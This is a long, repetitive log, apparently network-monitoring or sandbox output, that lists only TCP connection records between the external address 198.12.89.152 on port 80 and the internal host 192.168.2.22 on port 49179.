Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
